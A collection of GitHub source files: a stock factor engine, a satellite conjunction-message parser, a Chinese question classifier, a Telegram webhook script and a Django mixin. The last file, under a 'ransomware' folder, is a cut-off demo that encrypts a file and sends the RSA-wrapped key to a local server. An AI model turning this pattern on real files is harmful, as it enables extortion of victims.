remove_all_factors(self) -> None:\n self._factors = {}\n\n def to_cuda(self, enable_stream=False) -> None:\n \"\"\"\n Set enable_stream to True allows pipeline branches to calculation simultaneously.\n However, this will lead to more VRAM usage and may affect performance.\n \"\"\"\n self._device = torch.device('cuda')\n self._enable_stream = enable_stream\n self.empty_cache()\n\n def to_cpu(self) -> None:\n self._device = torch.device('cpu')\n self.empty_cache()\n\n def test_lookahead_bias(self, start, end):\n \"\"\"Check all factors, if there are look-ahead bias\"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n # get results\n df_expected = self.run(start, end)\n # modify future data\n dt_index = self._dataframe[start:].index.get_level_values(0).unique()\n mid = int(len(dt_index) / 2)\n mid_left = dt_index[mid-1]\n mid_right = dt_index[mid]\n length = self._dataframe.loc[mid_right:].shape[0]\n for col in self._loader.ohlcv:\n self._dataframe.loc[mid_right:, col] = np.random.randn(length)\n self._column_cache = {}\n # hack to disable reload _dataframe\n max_backwards = max([f.get_total_backwards_() for f in self._factors.values()])\n if self._filter:\n max_backwards = max(max_backwards, self._filter.get_total_backwards_())\n self._last_load = [start, end, max_backwards]\n # check if results are consistent\n df = self.run(start, end)\n # clean\n self.empty_cache()\n\n try:\n pd.testing.assert_frame_equal(df_expected[:mid_left], df[:mid_left])\n except AssertionError:\n raise RuntimeError('A look-ahead bias was detected, please check your factors code')\n return 'No assertion raised.'\n\n def _run(self, start, end, delay_factor):\n if len(self._factors) == 0:\n raise ValueError('Please add at least one factor to engine, then run again.')\n\n delays = {col for col, fct in self._factors.items() if fct.should_delay()}\n if not delay_factor and len(delays) > 0:\n warnings.warn(\"Warning!! 
delay_factor is set to False, \"\n \"but {} factors uses data that is only available \"\n \"after the market is closed.\".format(str(delays)),\n RuntimeWarning)\n delays = {}\n\n # make columns to data factors.\n if self._loader.ohlcv is not None:\n OHLCV.open.inputs = (self._loader.ohlcv[0], self._loader.adjustment_multipliers[0])\n OHLCV.high.inputs = (self._loader.ohlcv[1], self._loader.adjustment_multipliers[0])\n OHLCV.low.inputs = (self._loader.ohlcv[2], self._loader.adjustment_multipliers[0])\n OHLCV.close.inputs = (self._loader.ohlcv[3], self._loader.adjustment_multipliers[0])\n OHLCV.volume.inputs = (self._loader.ohlcv[4], self._loader.adjustment_multipliers[1])\n\n # shift factors if necessary\n filter_ = self._filter\n if filter_ and filter_.should_delay() and delay_factor:\n filter_ = filter_.shift(1)\n factors = {col: col in delays and fct.shift(1) or fct\n for col, fct in self._factors.items()}\n\n # calculate how much historical data is needed\n max_backwards = max([f.get_total_backwards_() for f in factors.values()])\n if filter_:\n max_backwards = max(max_backwards, filter_.get_total_backwards_())\n\n # copy data to tensor\n self._prepare_tensor(start, end, max_backwards)\n\n # clean up before start (may be keyboard interrupted)\n if filter_:\n filter_.clean_up_()\n for f in factors.values():\n f.clean_up_()\n\n # some pre-work\n if filter_:\n filter_.pre_compute_(self, start, end)\n for f in factors.values():\n f.pre_compute_(self, start, end)\n\n # schedule possible gpu work first\n results = {col: self._compute_and_revert(fct, col) for col, fct in factors.items()}\n shifted_mask = None\n if filter_:\n shifted_mask = self._compute_and_revert(filter_, 'filter')\n\n # do clean up again\n if filter_:\n filter_.clean_up_()\n for f in factors.values():\n f.clean_up_()\n\n return results, shifted_mask, len(delays) > 0\n\n def run(self, start: Union[str, pd.Timestamp], end: Union[str, pd.Timestamp],\n delay_factor=True) -> pd.DataFrame:\n \"\"\"\n Compute factors and filters, return a df contains all.\n \"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n\n results, shifted_mask, delayed = self._run(start, end, delay_factor)\n # do cpu work and synchronize will automatically done by torch\n ret = pd.DataFrame(index=self._dataframe.index.copy())\n ret = ret.assign(**{col: t.cpu().numpy() for col, t in results.items()})\n if shifted_mask is not None:\n ret = ret[shifted_mask.cpu().numpy()]\n\n # if any factors delayed, return df also should be delayed\n if delayed:\n index = ret.index.levels[0]\n start_ind = index.get_loc(start, 'bfill')\n if (start_ind + 1) >= len(index):\n raise ValueError('There is no data between start and end.')\n start = index[start_ind + 1]\n return ret.loc[start:]\n\n def run_raw(self, start: Union[str, pd.Timestamp], end: Union[str, pd.Timestamp],\n delay_factor=True) -> Dict[str, torch.Tensor]:\n \"\"\"\n Compute factors and filters, return a dict contains factor_name = torch.Tensor\n \"\"\"\n start, end = pd.to_datetime(start, utc=True), pd.to_datetime(end, utc=True)\n\n results, shifted_mask, delayed = self._run(start, end, delay_factor)\n\n index = self._dataframe.index.levels[0]\n start_ind = index.get_loc(start, 'bfill')\n if delayed: # if any factors delayed, return df also should be delayed\n start_ind += 1\n if start_ind >= len(index):\n raise ValueError('There is no data between start and end.')\n if shifted_mask is not None:\n shifted_mask = shifted_mask[start_ind:]\n results = {k: v[start_ind:][shifted_mask] 
for k, v in results.items()}\n else:\n results = {k: v[start_ind:] for k, v in results.items()}\n return results\n\n def get_factors_raw_value(self):\n stream = None\n if self._device.type == 'cuda':\n stream = torch.cuda.current_stream()\n return {c: f.compute_(stream) for c, f in self._factors.items()}\n\n def get_price_matrix(self,\n start: Union[str, pd.Timestamp],\n end: Union[str, pd.Timestamp],\n prices: ColumnDataFactor = OHLCV.close,\n ) -> pd.DataFrame:\n \"\"\"\n Get the price data for Factor Return Analysis.\n :param start: same as run\n :param end: should be longer than the `end` time of `run`, for forward returns calculations.\n :param prices: prices data factor. If you traded at the opening, you should set it\n to OHLCV.open.\n \"\"\"\n factors_backup = self._factors\n self._factors = {'price': AdjustedColumnDataFactor(prices)}\n\n # get tickers first\n assets = None\n if self._filter is not None:\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n assets_ret = self.run(start, end, delay_factor=False)\n assets = assets_ret.index.get_level_values(1).unique()\n\n filter_backup = self._filter\n self._filter = StaticAssets(assets)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n ret = self.run(start, end, delay_factor=False)\n self._factors = factors_backup\n self._filter = filter_backup\n\n ret = ret['price'].unstack(level=[1])\n return ret\n\n def plot_chart(self, start, end, trace_types=None, styles=None, delay_factor=True,\n inline=True):\n \"\"\"\n Plotting common stock price chart for researching.\n :param start: same as engine.run()\n :param end: same as engine.run()\n :param delay_factor: same as engine.run()\n :param trace_types: dict(factor_name=plotly_trace_type), default is 'Scatter'\n :param styles: dict(factor_name=plotly_trace_styles)\n :param inline: display plot immediately\n\n Usage::\n\n engine = factors.FactorEngine(loader)\n engine.timezone = 'America/New_York'\n engine.set_filter(factors.StaticAssets({'NVDA', 'MSFT'}))\n engine.add(factors.MA(20), 'MA20')\n engine.add(factors.RSI(), 'RSI')\n engine.to_cuda()\n engine.plot_chart('2017', '2018', styles={\n 'MA20': {\n 'line': {'dash': 'dash'}\n },\n 'RSI': {\n 'yaxis': 'y3',\n 'line': {'width': 1}\n }\n })\n\n \"\"\"\n df = self.run(start, end, delay_factor)\n figs = plot_chart(self._dataframe, self.loader_.ohlcv, df, trace_types=trace_types,\n styles=styles, inline=inline)\n return figs, df\n\n def full_run(self, start, end, trade_at='close', periods=(1, 4, 9),\n quantiles=5, filter_zscore=20, demean=True, preview=True\n ) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Return this:\n | \t | \t| Returns | factor_name \t|\n |date\t |asset\t|10D\t |factor\t |factor_quantile\t|\n |---------------------------|-------|-----------|-----------|-------------------|\n |2014-01-08 00:00:00+00:00\t|ARNC\t|0.070159\t|0.215274\t|5 |\n | |BA\t |-0.038556\t|-1.638784\t|1 |\n For alphalens analysis, you can use this:\n factor_data = full_run_return[['factor_name', 'Returns']].droplevel(0, axis=1)\n al.tears.create_returns_tear_sheet(factor_data)\n :param str, pd.Timestamp start: Factor analysis start time\n :param str, pd.Timestamp end: Factor analysis end time\n :param trade_at: Which price for forward returns. 
'open', or 'close.\n If is 'current_close', same as run engine with delay_factor=False,\n Be sure that no any high,low,close data is used in factor, otherwise will\n cause lookahead bias.\n :param periods: Forward return periods\n :param quantiles: Number of quantile\n :param filter_zscore: Drop extreme factor return, for stability of the analysis.\n :param demean: Whether the factor is converted into a hedged weight: sum(weight) = 0\n :param preview: Display a preview chart of the result\n \"\"\"\n factors = self._factors.copy()\n universe = self.get_filter()\n\n column_names = {}\n # add quantile factor of all factors\n for c, f in factors.items():\n self.add(f.quantile(quantiles, mask=universe), c + '_q_')\n self.add(f.to_weight(mask=universe, demean=demean), c + '_w_')\n column_names[c] = (c, 'factor')\n column_names[c + '_q_'] = (c, 'factor_quantile')\n column_names[c + '_w_'] = (c, 'factor_weight')\n\n # add the rolling returns of each period, use AdjustedColumnDataFactor for best performance\n shift = -1\n inputs = (AdjustedColumnDataFactor(OHLCV.close),)\n if trade_at == 'open':\n inputs = (AdjustedColumnDataFactor(OHLCV.open),)\n elif trade_at == 'current_close':\n shift = 0\n from .basic import Returns\n for n in periods:\n # Different: returns here diff by bar, which alphalens diff by time\n ret = Returns(win=n + 1, inputs=inputs).shift(-n + shift)\n mask = universe\n if filter_zscore is not None:\n # Different: The zscore here contains all backward data which alphalens not counted.\n zscore_factor = ret.zscore(groupby='asset', mask=universe)\n zscore_filter = zscore_factor.abs() <= filter_zscore\n if mask is not None:\n mask = mask & zscore_filter\n else:\n mask = zscore_filter\n self.add(ret.filter(mask), str(n) + '_r_')\n else:\n self.add(ret, str(n) + '_r_')\n self.add(ret.demean(mask=mask), str(n) + '_d_')\n\n # run and get df\n factor_data = self.run(start, end, trade_at != 'current_close')\n self._factors = factors\n factor_data.index = factor_data.index.remove_unused_levels()\n # factor_data.sort_index(inplace=True) # 140 ms\n assert len(factor_data.index.levels[0]) > max(periods) - shift, \\\n 'No enough data for forward returns, please expand the end date'\n last_date = factor_data.index.levels[0][-max(periods) + shift - 1]\n factor_data = factor_data.loc[:last_date]\n\n # infer freq\n delta = min(factor_data.index.levels[0][1:] - factor_data.index.levels[0][:-1])\n unit = delta.resolution_string\n freq = int(delta / pd.Timedelta(1, unit))\n # change columns name\n period_cols = {n: str(n * freq) + unit for n in periods}\n for n, period_col in period_cols.items():\n column_names[str(n) + '_r_'] = ('Returns', period_col)\n column_names[str(n) + '_d_'] = ('Demeaned', period_col)\n new_cols = pd.MultiIndex.from_tuples([column_names[c] for c in factor_data.columns])\n factor_data.columns = new_cols\n factor_data.sort_index(axis=1, inplace=True)\n\n # mean return, return std err\n mean_return = pd.DataFrame(columns=pd.MultiIndex.from_arrays([[], []]))\n for fact_name, _ in factors.items():\n group = [(fact_name, 'factor_quantile'), 'date']\n grouped_mean = factor_data[['Demeaned', fact_name]].groupby(group).agg('mean')\n for n, period_col in period_cols.items():\n demean_col = ('Demeaned', period_col)\n mean_col = (fact_name, period_col)\n mean_return[mean_col] = grouped_mean[demean_col]\n mean_return.index.set_names('quantile', level=0)\n mean_return = mean_return.groupby(level=0).agg(['mean', 'sem'])\n mean_return.sort_index(axis=1, inplace=True)\n\n # plot\n if 
preview:\n plot_quantile_and_cumulative_returns(factor_data, mean_return)\n\n return factor_data, mean_return\n","repo_name":"Heerozh/spectre","sub_path":"spectre/factors/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":23232,"program_lang":"python","lang":"en","doc_type":"code","stars":479,"dataset":"github-code","pt":"53"} +{"seq_id":"13059378417","text":"\"\"\"CDM module.\n\nThis module loads CDMS either from a .pdf-file or from the SQL database.\n\nExample\n-------\n\nNotes\n-----\n\nAttributes\n----------\n\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport fitz # this is pymupdf\nfrom datetime import datetime, timezone\nimport mysql.connector as sql\nfrom sqlalchemy import create_engine\nfrom astropy import units as u\n\n\nclass CDM:\n \"\"\"\n A Conjunction Data Message.\n Further information: https://public.ccsds.org/Pubs/508x0b1e2c2.pdf\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n \n \"\"\"\n # self.objectA = SatObject(\"ObjectA\")\n # self.objectB = SatObject(\"ObjectB\")\n \n\n def load_cdm_from_pdf(self, filename):\n \"\"\"\n Loads a CDM from a .pdf file.\n \"\"\"\n doc = fitz.open(filename) # open document\n for page in doc: # iterate the document pages\n text = str(page.get_text().encode(\"utf8\")) # get plain text (is in UTF-8)\n # TODO: add test for more than one pdf page\n \n lines = text.split('\\\\n')\n\n self.generation_date = datetime.strptime(lines[2].rpartition(\": \")[2].replace(\" \",\"\"),'%Y/%m/%d%H:%M').replace(tzinfo=timezone.utc)\n # print(generation_date)\n\n self.ccsds_cdm_vers = lines[5].rpartition(\":\")[2].strip()\n # print(ccsds_cdm_vers)\n self.creation_date = datetime.strptime(lines[6].rpartition(\": \")[2].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S').replace(tzinfo=timezone.utc)\n # print(creation_date)\n self.originator = lines[7].rpartition(\":\")[2].strip()\n # print(originator)\n self.message_for = lines[8].rpartition(\":\")[2].strip()\n # print(message_for)\n self.message_id = lines[9].rpartition(\":\")[2].strip()\n # print(message_id)\n\n self.tca = datetime.strptime(lines[11].split(\": \")[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc)\n # print(tca)\n self.miss_distance = float(lines[12].split(\": \")[1].strip())\n # print(miss_distance)\n self.relative_speed = float(lines[13].split(\": \")[1].strip())\n # print(relative_speed)\n rel_position_R = float(lines[14].split(\": \")[1].strip())\n # print(relative_position_R)\n rel_position_T = float(lines[15].split(\": \")[1].strip())\n # print(relative_position_T)\n rel_position_N = float(lines[16].split(\": \")[1].strip())\n # print(relative_position_N)\n self.rel_position_RTN = np.array([[rel_position_R],[rel_position_T],[rel_position_N]])\n self.collision_prob = float(lines[17].split(\": \")[1].strip())\n # print(collision_prob)\n self.collision_prob_method = lines[18].split(\": \")[1].strip()\n # print(collision_prob_method)\n\n line = lines[22].split(\": \")[1].strip().split(\" \")\n self.object_designator = [x for x in line if x]\n # print(object_designator)\n line = lines[23].split(\": \")[1].strip().split(\" \")\n self.object_name = [x for x in line if x]\n # print(object_name)\n line = lines[24].split(\": \")[1].strip().split(\" \")\n self.itn_designator = [x for x in line if x]\n # print(itn_designator)\n line = lines[25].split(\": \")[1].strip().split(\" \")\n self.object_type = [x for x in line if x]\n # print(object_type)\n line = lines[26].split(\": \")[1].strip().split(\" \")\n self.operator_organization = [x for x in line if x]\n # 
print(operator_organization)\n line = lines[27].split(\": \")[1].strip().split(\" \")\n self.ephemeris_name = [x for x in line if x]\n # print(ephemeris_name)\n line = lines[28].split(\": \")[1].strip().split(\" \")\n self.maneuverable = [x for x in line if x]\n # print(maneuverable)\n line = lines[29].split(\": \")[1].strip().split(\" \")\n self.ref_frame = [x for x in line if x]\n # print(ref_frame)\n line = lines[30].split(\" : \")[1].strip().split(\" \")\n self.gravity_model = [x for x in line if x]\n # print(gravity_model)\n line = lines[31].split(\": \")[1].strip().split(\" \")\n self.atmospheric_model = [x for x in line if x]\n # print(atmospheric_model)\n line = lines[32].split(\": \")[1].strip().split(\" \")\n self.n_body_perturbations = [x for x in line if x]\n # print(n_body_perturbations)\n line = lines[33].split(\": \")[1].strip().split(\" \")\n self.solar_rad_pressure = [x for x in line if x]\n # print(solar_rad_pressure)\n line = lines[34].split(\": \")[1].strip().split(\" \")\n self.earth_tides = [x for x in line if x]\n # print(earth_tides)\n line = lines[35].split(\": \")[1].strip().split(\" \")\n self.intrack_thrust = [x for x in line if x]\n # print(intrack_thrust)\n line = lines[36].split(\": \")[1].strip().split(\" \")\n line = [x for x in line if x]\n self.time_lastob_sta = []\n self.time_lastob_sta.append(datetime.strptime(line[0].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n self.time_lastob_sta.append(datetime.strptime(line[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n # print(time_lastob_sta)\n line = lines[37].split(\": \")[1].strip().split(\" \")\n line = [x for x in line if x]\n self.time_lastob_end = []\n self.time_lastob_end.append(datetime.strptime(line[0].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n self.time_lastob_end.append(datetime.strptime(line[1].replace(\" \",\"\"),'%Y/%m/%d%H:%M:%S.%f').replace(tzinfo=timezone.utc))\n # print(time_lastob_end)\n line = lines[38].split(\": \")[1].strip().split(\" \")\n self.rec_od_span = [float(x) for x in line if x]\n # print(rec_od_span)\n line = lines[39].split(\": \")[1].strip().split(\" \")\n self.actual_od_span = [float(x) for x in line if x]\n # print(actual_od_span)\n line = lines[40].split(\": \")[1].strip().split(\" \")\n self.obs_available = [float(x) for x in line if x]\n # print(obs_available)\n line = lines[41].split(\": \")[1].strip().split(\" \")\n self.obs_used = [float(x) for x in line if x]\n # print(obs_used)\n line = lines[42].split(\": \")[1].strip().split(\" \")\n self.residuals_accepted = [float(x) for x in line if x]\n # print(residuals_accepted)\n line = lines[43].split(\": \")[1].strip().split(\" \")\n self.weighted_rms = [float(x) for x in line if x]\n # print(weighted_rms)\n line = lines[44].split(\": \")[1].strip().split(\" \")\n self.area_pc = [float(x) for x in line if x]\n # print(area_pc)\n line = lines[45].split(\": \")[1].strip().split(\" \")\n self.area_drag = [float(x) for x in line if x]\n # print(area_drag)\n line = lines[46].split(\": \")[1].strip().split(\" \")\n self.area_srp = [float(x) for x in line if x]\n # print(area_srp)\n line = lines[47].split(\": \")[1].strip().split(\" \")\n self.mass = [float(x) for x in line if x]\n # print(mass)\n line = lines[48].split(\": \")[1].strip().split(\" \")\n self.cd_am = [float(x) for x in line if x]\n # print(cd_am)\n line = lines[49].split(\": \")[1].strip().split(\" \")\n self.cr_am = [float(x) for x in line if x]\n # print(cr_am)\n line = 
lines[50].split(\": \")[1].strip().split(\" \")\n self.thrust_acc = [float(x) for x in line if x]\n # print(thrust_acc)\n line = lines[51].split(\": \")[1].strip().split(\" \")\n self.sedr = [float(x) for x in line if x]\n # print(sedr)\n line = lines[52].split(\": \")[1].strip().split(\" \")\n X = [float(x) for x in line if x]\n # print(X)\n line = lines[53].split(\": \")[1].strip().split(\" \")\n Y = [float(x) for x in line if x]\n # print(Y)\n line = lines[54].split(\": \")[1].strip().split(\" \")\n Z = [float(x) for x in line if x]\n # print(Z)\n self.position_XYZ = np.array([X,Y,Z])\n line = lines[55].split(\": \")[1].strip().split(\" \")\n X_dot = [float(x) for x in line if x]\n # print(X_dot)\n line = lines[56].split(\": \")[1].strip().split(\" \")\n Y_dot = [float(x) for x in line if x]\n # print(Y_dot)\n line = lines[57].split(\": \")[1].strip().split(\" \")\n Z_dot = [float(x) for x in line if x]\n # print(Z_dot)\n self.position_dot_XYZ = np.array([X_dot,Y_dot,Z_dot])\n\n line = lines[59].split(\": \")[1].strip().split(\" \")\n self.apogee = [float(x) for x in line if x]\n # print(apogee)\n line = lines[60].split(\": \")[1].strip().split(\" \")\n self.perigee = [float(x) for x in line if x]\n # print(perigee)\n line = lines[61].split(\": \")[1].strip().split(\" \")\n self.eccentricity = [float(x) for x in line if x]\n # print(eccentricity)\n line = lines[62].split(\": \")[1].strip().split(\" \")\n self.inclination = [float(x) for x in line if x]\n # print(inclination)\n\n line = lines[64].split(\": \")[1].strip().split()\n self.RTN_1sigma = [float(x) for x in line if x]\n # print(RTN_1sigma)\n\n line = lines[66].split(\": \")[1].strip().split()\n RTN_covariance_temp = [float(x) for x in line if x]\n line = lines[67].strip().split()\n RTN_covariance_temp.append([float(x) for x in line if x])\n line = lines[68].strip().split()\n RTN_covariance_temp.append([float(x) for x in line if x])\n self.RTN_covariance = np.zeros((3,3,2))\n self.RTN_covariance[:,:,0] = np.array([ [RTN_covariance_temp[0],RTN_covariance_temp[2][0],RTN_covariance_temp[3][0]],\n [RTN_covariance_temp[2][0],RTN_covariance_temp[2][1],RTN_covariance_temp[3][1]],\n [RTN_covariance_temp[3][0],RTN_covariance_temp[3][1],RTN_covariance_temp[3][2] ] ])\n self.RTN_covariance[:,:,1] = np.array([ [RTN_covariance_temp[1],RTN_covariance_temp[2][2],RTN_covariance_temp[3][3]],\n [RTN_covariance_temp[2][2],RTN_covariance_temp[2][3],RTN_covariance_temp[3][4]],\n [RTN_covariance_temp[3][3],RTN_covariance_temp[3][4],RTN_covariance_temp[3][5] ] ] )\n","repo_name":"fabrizioturco/CAM_aerodynamic_drag","sub_path":"collisionAvoidanceAnalysis/conjunction_data_message.py","file_name":"conjunction_data_message.py","file_ext":"py","file_size_in_byte":10290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8116048695","text":"#-*- coding : utf-8 -*-\n# coding: utf-8\n\n\nimport os\nimport ahocorasick\n\nclass QuestionClassifier:\n def __init__(self):\n cur_dir = '/'.join(os.path.abspath(__file__).split('/')[:-1])\n # 特征词路径\n self.project_path = os.path.join(cur_dir, 'dict/project.txt')\n self.unit_path = os.path.join(cur_dir, 'dict/unit.txt')\n self.deny_path = os.path.join(cur_dir, 'dict/deny.txt')\n\n # 加载特征词\n self.project_wds= [i.strip() for i in open(self.project_path) if i.strip()]#encoding=\"utf-8\"\n self.unit_wds= [i.strip() for i in open(self.unit_path) if i.strip()]\n\n self.region_words = set(self.project_wds + self.unit_wds)\n # deny是一个反义词的合集,单独由人工列出\n self.deny_words = 
[i.strip() for i in open(self.deny_path,encoding=\"utf-8\") if i.strip()]\n # 构造领域actree,ac多模式匹配算法里的方法\n self.region_tree = self.build_actree(list(self.region_words))\n # 构建关键词与对应类型的词典\n self.wdtype_dict = self.build_wdtype_dict() #格式为[{'项目或单元名':'project或unit'},{'项目或单元名':'project或unit'},{数:'quantity'}……]\n\n\n\n # 工艺参数单位词,人工列出\n self.Qunit_qwds = ['吨/天', '吨每天', 'CMD', 't/d', 'tph', 't/h', 'm3/h', '吨每小时']\n self.Recovunit_qwds = ['%']\n self.CODunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n self.CIunit_qwds = ['Us', 'us', 'us/cm', 'ms', 'Ms', 'ms/cm']\n self.Hardunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n self.SSunit_qwds = ['mg', 'mg/L', 'mg/l', 'ppm']\n\n\n\n\n # 问句疑问词,人工列出\n self.process_qwds = ['哪些工艺单元','工艺单元有哪些','什么工艺', '什么流程', '什么工艺流程','哪些工艺','工艺有哪些', '哪些流程', '哪些工艺流程','哪种工艺', '哪种流程', '哪种工艺流程','工艺是什么','工艺流程是什么']\n self.project_qwds = ['什么项目', '什么工程', '哪个项目', '哪个工程','项目有哪些','有哪些项目']\n self.unit_qwds = ['什么设备', '什么单元', '哪个设备', '哪个单元']\n\n\n\n\n\n\n print('model init finished ......') #以上是输入问答模型的基础数据\n\n return\n\n '''分类主函数'''\n def classify(self, question):\n data = {}\n project_dict = self.check_project(question) #check_project:用wdtype_dict进行问句过滤,最终构建成一个符合问句的关键词和关键词类型的字典\n if not project_dict:\n return {}\n data['args'] = project_dict # 将关键词和关键词类型的字典输入一个更大的字典data,这里面存储了问题中提到了哪些节点\n #收集问句当中所涉及到的实体类型\n types = []\n for type_ in project_dict.values(): # 将关键词类型的存储为type\n types += type_\n question_type = 'others'\n\n question_types = []\n\n ## 目标解决以下问题\n # 1 知道项目名称查工艺\n # 2 知道某个工艺查哪个项目用了这个工艺\n # 3 知道进出水的水量、水质、回收率的一个或几个参数查工艺\n # 4 知道某个单元的进水或出水工艺参数名称查项目名称\n # 5 查询某个单元的最高、最低、平均进水或出水工艺参数(附加)\n # 6 知道工艺参数的范围或不与数据库完全匹配的值,进行工艺流程模糊匹配(目标)\n\n # 1 知道项目名称查工艺\n # 如果问句中包含流程查询且明确的项目名称在查询语句中,如:\n # 蒙西污水处理厂的工艺是什么……日铭三期回用水用了哪些工艺……泰州可利放流回用水包含哪些工艺\n if self.check_words(self.process_qwds, question) and ('project' in types):\n question_type = 'project_unit'\n question_types.append(question_type)\n\n # 2 知道某个工艺查哪个项目用了这个工艺\n # 如果问句中包含项目查询且明确的某个单元名称在查询语句中,如:\n # 用了一级二段反渗透的项目有哪些……用自清洗过滤器的有哪些项目……什么项目用了浸没式超滤\n if self.check_words(self.project_qwds, question) and ('unit' in types):\n question_type = 'unit_project'\n question_types.append(question_type)\n\n # # 6 知道工艺参数的范围或不与数据库完全匹配的值,进行工艺流程模糊匹配(目标)\n # if self.check_words(self.project_qwds, question) and ('unit' in types):\n # question_type = 'wquality_process'\n # question_types.append(question_type)\n #\n\n # 将多个分类结果进行合并处理,组装成一个字典\n data['question_types'] = question_types\n\n\n return data\n\n '''筛选出构造词对应的类型,也就是够造'args'后面的内容'''\n def build_wdtype_dict(self):\n wd_dict = dict()\n for wd in self.region_words:\n wd_dict[wd] = []\n if wd in self.project_wds:\n wd_dict[wd].append('project')\n if wd in self.unit_wds:\n wd_dict[wd].append('unit')\n\n return wd_dict\n #wd_dict格式为[{'项目或单元名':'project或unit'},{'项目或单元名':'project或unit'},{数:'quantity'}……]\n ## 格式或为{}\n\n '''构造actree,加速过滤'''\n def build_actree(self, wordlist):\n actree = ahocorasick.Automaton()\n for index, word in enumerate(wordlist):\n actree.add_word(word, (index, word))\n actree.make_automaton()\n return actree\n\n '''问句过滤从wdtype_dict中过滤出符合question的关键词和关键词类型的字典'''\n def check_project(self, question):\n region_wds = []\n for i in self.region_tree.iter(question):\n wd = i[1][1]\n region_wds.append(wd)\n stop_wds = []\n for wd1 in region_wds:\n for wd2 in region_wds:\n if wd1 in wd2 and wd1 != wd2:\n stop_wds.append(wd1)\n final_wds = [i for i in region_wds if i not in stop_wds]\n final_dict = {i:self.wdtype_dict.get(i) for i in final_wds}\n\n return final_dict\n\n '''基于特征词进行分类'''\n def check_words(self, wds, sent):\n 
for wd in wds:\n if wd in sent:\n return True\n return False\n\n\nif __name__ == '__main__':\n handler = QuestionClassifier()\n while 1:\n question = input('input an question:')\n data = handler.classify(question)\n print(data)","repo_name":"cooperck/QA_ReuseWater_KG","sub_path":"ruw_question_classifier.py","file_name":"ruw_question_classifier.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1170301963","text":"import telegram\n\nprint(\"provide token\")\ntoken = input()\nprint(\"provide webhook url (or no to use existing)\")\nurl = input()\n\nbot = telegram.Bot(token=token)\n\nif url == \"no\":\n url = bot.get_webhook_info()['url']\n\n\nbot.set_webhook(url, allowed_updates=[\"new_chat_members\"]) and print(\"Successfully updated\")\n","repo_name":"MehmetErkcn/VenusWelcomeBot","sub_path":"external_utilities/set_webhook.py","file_name":"set_webhook.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22026374950","text":"from django.db.models import Count\n\nfrom .models import *\n\nmenu = [{'title': \"О нас\", 'url_name': 'about'},\n {'title': \"Обратная связь\", 'url_name': 'contact'},\n {'title': \"Добавить услугу\", 'url_name': 'add_page'},\n ]\n\n\nclass DataMixin:\n paginate_by = 10\n\n def get_user_context(self, **kwargs):\n context = kwargs\n cats = Category.objects.annotate(Count('service'))\n\n user_menu = menu.copy()\n if not self.request.user.is_superuser:\n user_menu.pop(2)\n\n context['menu'] = user_menu\n\n context['cats'] = cats # tag для html\n if 'cat_selected' not in context:\n context['cat_selected'] = 0\n return context\n","repo_name":"VDK45/AvtoAvtoStandart","sub_path":"avtosite/avto_tochka/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32539290422","text":"# Cryptography imports for encrypting the keys\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding, rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.fernet import Fernet\n\n# Socket import for using TCP/IP to connect to the server\nimport socket\n\n\"\"\"\nThis file is used to encrypt a file using a symmetric key. The symmetric key is encrypted using the public key of the recipient.\nThe encrypted key is then saved to a file. 
That key is then used to encrypt a file.\n\"\"\"\n\n# Using Fetnet to generate a token for the key\nsymmetricKey = Fernet.generate_key()\nFernetInstance = Fernet(symmetricKey)\n\n# Opening the public_key to load into memory\nwith open(\"./keys/public_key.key\", \"rb\") as key_file:\n public_key = serialization.load_pem_public_key(\n key_file.read(),\n backend=default_backend()\n )\n\n# Creating an encryptedSymmetricKey with the public_key for encryption\n# using SHA256\nencryptedSymmetricKey = public_key.encrypt(\n symmetricKey,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA256()),\n algorithm=hashes.SHA256(),\n label=None\n )\n)\n\n# Opening or creating the encrypted key file and writing the encryption to\n# it, reading the Fernet Instance and writing the data\nwith open(\"./keys/encryptedSymmertricKey.key\", \"wb\") as key_file:\n key_file.write(encryptedSymmetricKey)\n filePath = \"./ransomware/SecretTextFile.txt\"\n\n with open(filePath, \"rb\") as file:\n file_data = file.read()\n print(file_data)\n encrypted_data = FernetInstance.encrypt(file_data)\n\n with open(filePath, \"wb\") as file:\n file.write(encrypted_data)\n\n\ndef decryptFile(filePath, key):\n FernetInstance = Fernet(key)\n with open(filePath, \"rb\") as d_file:\n file_data = d_file.read()\n decrypted_data = FernetInstance.decrypt(file_data)\n\n with open(\"./ransomware/decryptedTextFile.txt\", \"wb\") as file:\n file.write(decrypted_data)\n\n\ndef sendEncryptedKey(eKeyFilePath):\n with socket.create_connection((\"127.0.0.1\", 8000)) as sock:\n with open(eKeyFilePath, \"rb\") as file:\n file_data = file.read()\n sock.send(file_data)\n decryptedSymmetricKey = sock.recv(1024).strip()\n decryptFile(\"./ransomware/SecretTextFile.txt\",\n 